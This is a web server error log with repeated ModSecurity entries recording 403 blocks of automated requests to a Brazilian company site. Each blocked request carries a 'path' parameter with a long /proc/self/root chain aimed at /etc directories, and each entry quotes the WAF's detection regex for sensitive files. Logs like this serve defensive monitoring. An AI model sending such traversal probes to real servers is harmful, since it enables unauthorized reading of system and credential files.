[Thu Mar 19 03:57:53.055733 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.243.128:46056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuecQbLMZ6AikZjR9UklQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:57:53.088821 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:35796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuecda6ubjKNq_cu4YGTwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:54.399346 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:35800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuecuyqAr6etmhZHNorRgAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:55.706842 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:35806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuec8df6f5d65gmYZQ6gQAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:56.627934 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.243.128:46066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuedF_V7PWP6ixUYl6DOAAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:57:59.295489 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:35812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuedwkwaGbbGflqUZB7uQAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:01.440930 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:46076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueeeyqAr6etmhZHNorTwAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:58:02.935018 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:50484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueesdf6f5d65gmYZQ6gwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:58:03.939557 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:53636] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuee-oXxyEfFpUF8f_YtQAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:58:04.255096 2026] [:error] [pid 27293:tid 140411674785536] [client 74.7.243.128:50494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuefP-YZRR_7pZ7nDJUmQAAA8g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:05.548365 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.243.128:50508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueff-YZRR_7pZ7nDJUmgAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:58:07.463127 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:50512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuefvu8EFLIOrSqIptk9QAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:58:11.503707 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:50522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuegwkwaGbbGflqUZB7wAAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:13.247483 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.241.31:53648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuehRkFeYa1D6dYQnC0KgAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:14.933777 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.243.128:43684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuehhkFeYa1D6dYQnC0LgAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:17.376799 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:43690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueiQkwaGbbGflqUZB7yQAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:18.853611 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.241.31:36998] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueiRkFeYa1D6dYQnC0MQAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:58:20.232728 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:43698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuejOyqAr6etmhZHNorUwAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:58:21.395296 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:52970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuejfu8EFLIOrSqIptlBwAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:21.562808 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:45706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuejeoXxyEfFpUF8f_YtwAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:23.884723 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:45716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuejuyqAr6etmhZHNorVQAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
